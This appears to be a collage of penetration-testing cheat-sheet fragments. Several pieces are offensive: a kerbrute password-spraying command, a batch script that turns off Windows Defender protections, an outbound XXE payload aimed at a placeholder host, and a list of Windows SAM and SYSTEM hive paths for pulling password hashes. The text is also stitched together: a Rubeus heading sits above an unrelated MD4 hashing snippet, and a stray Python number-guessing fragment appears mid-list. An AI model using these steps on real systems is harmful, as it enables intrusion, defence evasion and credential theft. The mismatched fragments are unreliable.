With kerbrute.py:

```
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
```

With Rubeus version with brute module:
```sh
password='Passw0rd!'
# NT hash = MD4 over the UTF-16LE encoding of the password (no salt, no length padding).
# iconv -f ascii only accepts ASCII input; use -f utf-8 for passwords with non-ASCII characters.
# On OpenSSL 3.x MD4 is in the legacy provider, so add "-provider legacy -provider default" before -md4.
echo -n "$password" | iconv -f ascii -t utf-16le | openssl dgst -md4
```
```bat
rem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!!
rem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference
rem To also disable Windows Defender Security Center include this
rem reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem 1 - Disable Real-time protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
```
Vanilla, used to verify outbound XXE or blind XXE:

```xml
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
```
```python
import random

start = 1
end = 100
# randint is inclusive on both ends, so the upper bound is end, not end+1
# (end+1 would allow 101 to be drawn).
r = random.randint(start, end)
print("Random number: " + str(r))
# Integer midpoint used as the first guess (the / operator would give a float).
g = end // 2
for i in range(1, 100):
    print("g = " + str(g))
```
- `%SYSTEMDRIVE%\boot.ini`
- `%WINDIR%\win.ini`: another file that can be counted on to be readable by all users of a system.
- `%SYSTEMROOT%\repair\SAM`, `%SYSTEMROOT%\System32\config\RegBack\SAM`: stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in `\repair` is locked, but can be retrieved using forensic or Volume Shadow Copy methods.
- `%SYSTEMROOT%\repair\system`, `%SYSTEMROOT%\System32\config\RegBack\system`: the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in `\repair` is locked, but can be retrieved using forensic or Volume Shadow Copy methods.
- `%SYSTEMROOT%\repair\SAM`, `%SYSTEMROOT%\System32\config\RegBack\SAM`: these files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files.
- `%WINDIR%\repair\sam`
- `%WINDIR%\repair\system`
```sh
#!/bin/sh
# Scheduled scan of the internal range; each run is written to a timestamped
# scan-<date>.{nmap,gnmap,xml} set so consecutive runs can be diffed.
TARGETS="192.168.1.0/24"
OPTIONS="-v -T4 -F -sV"
date=$(date +%Y-%m-%d-%H-%M-%S)
# Abort rather than scanning into the wrong directory if /nmap/diffs is missing.
cd /nmap/diffs || exit 1
nmap $OPTIONS $TARGETS -oA "scan-$date" > /dev/null
# Uploads the diff file for this run to the #alerts channel.
# token=xxxx-xxxx-xxxx is a placeholder for a real Slack API token.
slack(){
  curl -F "file=@diff-$date" -F initial_comment="Internal Port Change Detected" -F channels="#alerts" -F token=xxxx-xxxx-xxxx https://slack.com/api/files.upload
}
```